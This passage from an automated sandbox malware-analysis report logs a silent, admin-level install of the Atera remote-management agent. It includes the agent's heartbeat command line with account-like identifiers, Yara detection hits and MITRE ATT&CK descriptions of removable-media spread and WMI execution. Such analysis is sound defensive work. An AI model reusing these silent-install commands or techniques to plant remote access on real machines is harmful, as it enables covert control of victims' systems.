Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe, Author: Joe Security
Has exited:	false

Target ID:	56
Start time:	10:13:25
Start date:	11/12/2024
Path:	C:\Windows\System32\msiexec.exe
Wow64 process (32bit):	false
Commandline:	"msiexec.exe" /i C:\Windows\TEMP\ateraAgentSetup64_1_8_7_2.msi /lv* AteraSetupLog.txt /qn /norestart
Imagebase:	0x7ff6be720000
File size:	69'632 bytes
MD5 hash:	E5DA170027542E25EDE42FC54C929077
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000038.00000003.2773115836.00000175695DD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000038.00000003.2773306481.0000017568C6A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000038.00000003.2773115836.00000175695E4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000038.00000002.2774336632.0000017568C71000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000038.00000003.2713672868.0000017569510000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000038.00000003.2773192747.00000175695E4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000038.00000002.2774555804.00000175695E4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000038.00000003.2773226461.0000017568C6F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000038.00000002.2774246214.0000017568C6D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000038.00000002.2774511491.00000175695DE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000038.00000003.2773266363.0000017568C5B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Target ID:	57
Start time:	10:13:26
Start date:	11/12/2024
Path:	C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageHeartbeat\AgentPackageHeartbeat.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageHeartbeat\AgentPackageHeartbeat.exe" dfb304ca-1bde-49cc-a755-fa31deeb53c5 "5070f66e-f4af-405a-83ec-4c6f4d61e8fc" agent-api.atera.com/Production 443 or8ixLi90Mf "heartbeat" 001Q300000Of2eLIAR
Imagebase:	0x2a332340000
File size:	27'696 bytes
MD5 hash:	797C9554EC56FD72EBB3F6F6BEF67FB5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000039.00000002.2568740282.000002A332560000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000039.00000002.2574946100.000002A332F6E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000039.00000002.2573605708.000002A3326A2000.00000002.00000001.01000000.00000035.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000039.00000002.2568740282.000002A33263C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000039.00000002.2568740282.000002A3325EE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000039.00000002.2568740282.000002A3325AF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000039.00000002.2580997801.000002A34B5F0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000039.00000002.2574946100.000002A332E21000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000039.00000002.2574440622.000002A3327B0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000039.00000002.2568740282.000002A3325A2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000039.00000002.2568740282.000002A33256C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 0%, ReversingLabs
Has exited:	true

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may move onto systems, possibly those on disconnected or air-gapped networks, by copying malware to removable media and taking advantage of Autorun features when the media is inserted into a system and executes. In the case of Lateral Movement, this may occur through modification of executable files stored on removable media or by copying malware and renaming it to look like a legitimate file to trick users into executing it on a separate system. In the case of Initial Access, this may occur through manual manipulation of the media, modification of systems used to initially format the media, or modification to the media's firmware itself.
Tactics:	Initial Access, Lateral Movement
Data Sources:	Drive: Drive Creation, File: File Access, File: File Creation, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre